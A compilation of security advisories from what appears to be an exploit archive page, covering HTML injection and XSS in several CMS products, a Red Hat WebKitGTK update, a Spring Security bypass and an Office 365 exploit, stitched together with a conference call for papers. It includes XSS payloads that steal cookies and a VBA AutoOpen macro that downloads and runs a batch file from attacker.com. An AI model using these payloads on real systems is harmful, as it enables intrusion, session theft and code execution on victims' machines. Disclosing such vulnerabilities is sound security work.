Active Super Shop CMS version 2.5 suffers from an html injection vulnerability.

Document Title:  
===============  
Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2278

Release Date:  
=============  
2023-07-04

Vulnerability Laboratory ID (VL-ID):  
====================================  
2278

Common Vulnerability Scoring System:  
====================================  
5.4

Vulnerability Class:  
====================  
Script Code Injection

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application.

Affected Product(s):  
====================  
ActiveITzone  
Product: Active Super Shop CMS v2.5 (CMS) (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2021-08-20: Researcher Notification & Coordination (Security Researcher)  
2021-08-21: Vendor Notification (Security Department)  
2021-**-**: Vendor Response/Feedback (Security Department)  
2021-**-**: Vendor Fix/Patch (Service Developer Team)  
2021-**-**: Security Acknowledgements (Security Department)  
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application.  
The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content.

The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module.  
Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on  
profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the  
manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview  
of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side.

Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and  
persistent manipulation of affected application modules.

Request Method(s):  
[+] POST

Vulnerable Module(s):  
[+] Manage Details

Vulnerable Parameter(s):  
[+] name  
[+] phone  
[+] address

Affected Module(s):  
[+] manage profile  
[+] products branding

Proof of Concept (PoC):  
=======================  
The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction.  
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload  
<img src="https://[DOMAIN]/[PATH]/[PICTURE].*">

Vulnerable Source: manage_admin & branding  
<div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;">  
<div class="panel-heading">  
<h3 class="panel-title">Manage Details</h3>  
</div>  
<form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/"  class="form-horizontal" method="post" accept-charset="utf-8">  
<div class="panel-body">  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-1">Name</label>  
<div class="col-sm-6">  
<input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required">  
</div></div>  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-2">Email</label>  
<div class="col-sm-6">  
<input type="email" name="email" value="accountant@shop.com"  id="demo-hor-2" class="form-control required">  
</div></div>  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-3">  
Phone</label>  
<div class="col-sm-6">  
<input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control">  
</div></div>

--- PoC Session Logs (POST) ---  
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/  
Host: assm_cms.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html, */*; q=0.01  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680  
Content-Length: 902  
Origin:https://assm_cms.localhost:8080  
Connection: keep-alive  
Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/  
Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1  
-  
POST: HTTP/3.0 200 OK  
content-type: text/html; charset=UTF-8  
ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly  
https://assm_cms.localhost:8080/shop/admin/manage_admin/  
Host: assm_cms.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: keep-alive

Reference(s):  
https://assm_cms.localhost:8080/shop/  
https://assm_cms.localhost:8080/shop/admin/  
https://assm_cms.localhost:8080/shop/admin/manage_admin/  
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/

Solution - Fix & Patch:  
=======================  
Disallow inseration of html code for input fields like name, adress and phone. Sanitize the content to secure deliver.

Security Risk:  
==============  
The security risk of the html injection web vulnerabilities in the shopping web-application are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Active Super Shop CMS 2.5 HTML Injection

Red Hat Security Advisory 2023-4202-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:4202-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4202  
Issue date:        2023-07-18  
CVE Names:         CVE-2023-32435 CVE-2023-32439   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* webkitgtk: memory corruption issue leading to arbitrary code execution  
(CVE-2023-32435)

* webkitgtk: type confusion issue leading to arbitrary code execution  
(CVE-2023-32439)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2218626 - CVE-2023-32435 webkitgtk: memory corruption issue leading to arbitrary code execution  
2218640 - CVE-2023-32439 webkitgtk: type confusion issue leading to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
webkit2gtk3-2.38.5-1.el8_8.5.src.rpm

aarch64:  
webkit2gtk3-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.5.aarch64.rpm

ppc64le:  
webkit2gtk3-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.5.ppc64le.rpm

s390x:  
webkit2gtk3-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.5.s390x.rpm

x86_64:  
webkit2gtk3-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.5.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32435  
https://access.redhat.com/security/cve/CVE-2023-32439  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJktsBfAAoJENzjgjWX9erEVxoP/36PunYG/abTGPhTbzDfc4Gr  
TWe+1YZ0Bumn74sUuOk8Fk//CMm1W5NXMCZFK+grCQ5wNvJbQEpYQMU9Xz8kcpju  
Gv64wyRnXbYPCK2EgHKKHzMTNO0dK5rG1EQAQDZ/B+rdR9eX+7+oq+Mk4PsluHjc  
lmlixilcWV1j1GX3LqebpK3bT9kyGUdIzJ0M1r3Om9jPiyzbXQF508IPX/ZDJRzr  
AhMQ0dbMEgI7tLrXa+1il0VAlO47wpowlptaQafUXdZq1CqROOUaZDyTfP/8EoaJ  
Vmb6+FWx80cr+TNz644yAu4UpGnU4ajFWGrmQ7KCl9yTEVlEosGFtMpeeg0hCMvx  
VVki9nOPCtWsFKjuGmoLWVnUoeArkC4jkBw625Vp3JbgYhDyAtu2vnUig2gEXr5z  
pHgYxJz685dxo6y7Np+qxIozEuQxn1WlzBoUA+bha5GpgLuj8SHrMLsEqq3bnDbI  
5HMxutilgJIBHepvCUHsF6hn/MiSzhe0xKa7Vr6iJ58tBAW9thmKtLEV00rbXA+t  
5wMnEZkqEO/ACBuAgXiIllPgY58BXMnX7g4Ua9QwXLGVuRog3UrsBkuKUtAegUoS  
eTqth5pj2G+f1GeEAeUhN75o7xfdnCcyfdOXNWlnrJkMje7YWo3ApGBCQrRMHs28  
o5CVaCkiRISWgqNqTP2a  
=C5ZF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4202-01

In GeoVision GV-ADR2701 cameras, an attacker could edit the login response to access the web application.



CVE-2023-3638

Using "**" as a pattern in Spring Security configuration 
for WebFlux creates a mismatch in pattern matching between Spring 
Security and Spring WebFlux, and the potential for a security bypass.



**Description**

Using "**" as a pattern in Spring Security configuration for WebFlux creates a mismatch in pattern matching between Spring Security and Spring WebFlux, and the potential for a security bypass.

**Affected Spring Products and Versions**

Spring Security:

*   6.1.0 to 6.1.1
*   6.0.0 to 6.0.4
*   5.8.0 to 5.8.4
*   5.7.0 to 5.7.9
*   5.6.0 to 5.6.11

**Mitigation**

The following Spring Security versions contain fixes for this vulnerability:

*   6.1.2+
*   6.0.5+
*   5.8.5+
*   5.7.10+
*   5.6.12+

The above require Spring Framework versions:

*   6.0.11+
*   5.3.29+
*   5.2.25+

**Credit**

This vulnerability was disclosed responsibly by tkswifty and Ha1c9on.

**References**

*   https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C/CR:H/IR:H/AR:X/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:H/MA:N&version=3.1

CVE-2023-34034: CVE-2023-34034: WebFlux Security Bypass With Un-Prefixed Double Wildcard Pattern

Boom CMS version 8.0.7 suffers from a cross site scripting vulnerability.

    Document Title:===============Boom CMS v8.0.7 - Cross Site Scripting VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2274Release Date:=============2023-07-03Vulnerability Laboratory ID (VL-ID):====================================2274Common Vulnerability Scoring System:====================================5.3Vulnerability Class:====================Cross Site Scripting - PersistentCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes lifeeasy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content.It gives editors control but doesn't require any technical knowledge.(Copy of the Homepage:https://www.boomcms.net/boom-boom  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application.Affected Product(s):====================UXB LondonProduct: Boom v8.0.7 - Content Management System (Web-Application)Vulnerability Disclosure Timeline:==================================2022-07-24: Researcher Notification & Coordination (Security Researcher)2022-07-25: Vendor Notification (Security Department)2023-**-**: Vendor Response/Feedback (Security Department)2023-**-**: Vendor Fix/Patch (Service Developer Team)2023-**-**: Security Acknowledgements (Security Department)2023-07-03: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (User Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Responsible DisclosureTechnical Details & Description:================================A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application.The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromisebrowser to web-application requests from the application-side.The vulnerability is located in the input fields of the album title and album description in the asset-manager module.Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description.After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets.The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parsethe content by usage of a backslash. Thus does not have any impact to inject own maliciousjava-scripts because of its only performed for double- and single-quotes to prevent sql injections.Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistentexternal redirects to malicious source and persistent manipulation of affected application modules.Request Method(s):[+] POSTVulnerable Module(s):[+] assets-manager (album)Vulnerable Function(s):[+] addVulnerable Parameter(s):[+] title[+] descriptionAffected Module(s):[+] Frontend (Albums)[+] Backend (Albums Assets)Proof of Concept (PoC):=======================The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.Manual steps to reproduce the vulnerability ...1. Login to the application as restricted user2. Create a new album3. Inject a test script code payload to title and description4. Save the request5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution6. Successful reproduce of the persistent cross site web vulnerability!Payload(s):><script>alert(document.cookie)</script><div style=1<a onmouseover=alert(document.cookie)>test</a>--- PoC Session Logs (Inject) ---https://localhost:8000/boomcms/album/35Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/jsonX-Requested-With: XMLHttpRequestContent-Length: 263Origin:https://localhost:8000Connection: keep-aliveReferer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]Sec-Fetch-Site: same-origin{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>","slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by":null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}-PUT: HTTP/1.1 200 OKServer: ApacheCache-Control: no-cache, privateSet-Cookie: Max-Age=7200; path=/Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;Max-Age=7200; path=/; httponlyContent-Length: 242Connection: Keep-AliveContent-Type: application/json-https://localhost:8000/boomcms/asset-manager/albums/[evil.source]Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;-GET: HTTP/1.1 200 OKServer: ApacheCache-Control: no-cache, privateSet-Cookie:Vary: Accept-EncodingContent-Length: 7866Connection: Keep-AliveContent-Type: text/html; charset=UTF-8-Vulnerable Source: asset-manager/albums/[ID]<li data-album="36">         <a href="#albums/20">             <div>                 <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3>                 <p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>                 <p class='count'><span>0</span> assets</p>             </div>         </a>     </li></iframe></p></div></a></li></ul></div></div>         </div>         <div id="b-assets-view-asset-container"></div>         <div id="b-assets-view-selection-container"></div>         <div id="b-assets-view-album-container"><div><div id="b-assets-view-album">         <div class="heading">             <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1>             <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>         </div>Solution - Fix & Patch:=======================The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters.Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks.Security Risk:==============The security risk of the persistent input validation web vulnerability in the application is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Boom CMS 8.0.7 Cross Site Scripting

Microsoft Office 365 version 18.2305.1222.0 suffers from a remote code execution vulnerability when a malicious link is clicked on in a Word file.

    ## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation ofPrivilege Vulnerability + RCE.## Author: nu11secur1ty## Date: 07.18.2023## Vendor: https://www.microsoft.com/## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office## Reference: https://portswigger.net/web-security/access-control## CVE-2023-33148## Description:The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable toElevation of Privilege.The attacker can use this vulnerability to attach a very maliciousWORD file in the Outlook app which is a part of Microsoft Office 365and easily can trick the victim to click on it - opening it andexecuting a very dangerous shell command, in the background of thelocal PC. This execution is without downloading this malicious file,and this is a potential problem and a very dangerous case! This can bethe end of the victim's PC, it depends on the scenario.WARNING! Office 365 executes files directly from Outlook, without tempdownloading, security checking and etc.## Staus: HIGH Vulnerability[+]Exploit:- - - NOTE:This exploit is connected to the third-party server, and when thevictim clicks on it and opens it the content of the script which isinside will fetch on the machine locally and execute himself by usingMS Office 365 and Outlook app which is a part of the 365 API.```vbSub AutoOpen()  Call Shell("cmd.exe /S /c" & "curl -shttps://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat&& .\salaries.bat", vbNormalFocus)End Sub```## Reproduce:[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)## Proof and Exploit[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)## Time spend:00:35:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ andhttps://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Microsoft Office 365 18.2305.1222.0 Remote Code Execution

The call for papers for Hardwear.io 2023 in the Netherlands is now open. It will take place November 2nd through the 3rd, 2023 at the Marriott Hotel, The Hague, Netherlands.

    *Conference Name: *Hardwear.io Netherlands 2023*Important Dates:**CFP Deadline: *20th August 2023*Conference Dates: *2nd-3rd November 2023*Venue: *Marriott Hotel, The Hague, Netherlands*Website Link: *https://hardwear.io/netherlands-2023/Share your research findings with the Hardware community by becoming aspeaker!Welcome to the 09th Edition of Hardwear.io Netherlands, fasten yourseatbelts for intensive in-person trainings, top-notch hardware-securitytalks, professional networking, stimulating CTFs, and a challenging HardPwn.*Research Submission Categories:*1. *New Research: *A research topic that has not been presented/publishedor is not going to be presented/published before Hardwear.io Netherlands2023.2. *Current Research and Workshops: *Comprises known security issues, newresearch presented/published elsewhere, case studies, twist to existingresearch, vulnerability, exploit, or research-in-progress.3. *Tool Category: *Comprises open-source security tools, exploits,hardware, etc. This is an excellent opportunity for the original authors toshowcase their work to the world.*Speaker Benefits: *https://hardwear.io/netherlands-2023/cfp.phpWe are interested in new and cutting-edge security work that has previouslynot been published. Some security topics for your reference include (butare not limited to):Internet of Things / Smart Devices | Embedded Systems & Cryptography |Industrial Control Systems / SCADA | Satellite Systems | Hardware Firmware| Hardware PentestingReach out to cfp@hardwear.io for any further questions. Thank you!----------*Regards,**Sakshi Pitale**Community Outreach Officer **Nullcon Goa 2023 <https://nullcon.net/goa-2023> | CFP<https://nullcon.net/goa-2023/cfp/> | Registration<https://nullcon.net/goa-2023/Registration/>*

Hardwear.io NL 2023 Call For Papers

Clip Share version 4.1.4 suffers from a cross site scripting vulnerability.

**Clip Share 4.1.4 Cross Site Scripting**

Posted Jul 19, 2023

Authored by indoushka

Clip Share version 4.1.4 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | f104b1e9de39e7d0bb70da284aab85d83380acd95357f1cdeaf43197d30dc724

Download | Favorite | View

**Clip Share 4.1.4 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Clip Share 4.1.4 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.clip-share.com/                                                                                         || # Dork      : Powered By ClipShare                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Xss :   This vulnerability affects /ClipShare/signup.    URL encoded POST input username was set to xtqewoxj" onmouseover=prompt(993897) bad="   The input is reflected inside a tag parameter between double quotes.   URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(901680) bad="   The input is reflected inside a tag parameter between double quotes.Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,696)
*   Arbitrary (16,150)
*   BBS (2,859)
*   Bypass (1,732)
*   CGI (1,025)
*   Code Execution (7,233)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,342)
*   Encryption (2,365)
*   Exploit (51,589)
*   File Inclusion (4,207)
*   File Upload (963)
*   Firewall (821)
*   Info Disclosure (2,752)
*   Intrusion Detection (890)
*   Java (3,009)
*   JavaScript (851)
*   Kernel (6,639)
*   Local (14,427)
*   Magazine (586)
*   Overflow (12,638)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,649)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,635)
*   Security Tool (7,873)
*   Shell (3,172)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,195)
*   SQL Injection (16,299)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,691)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,849)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,792)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,198)
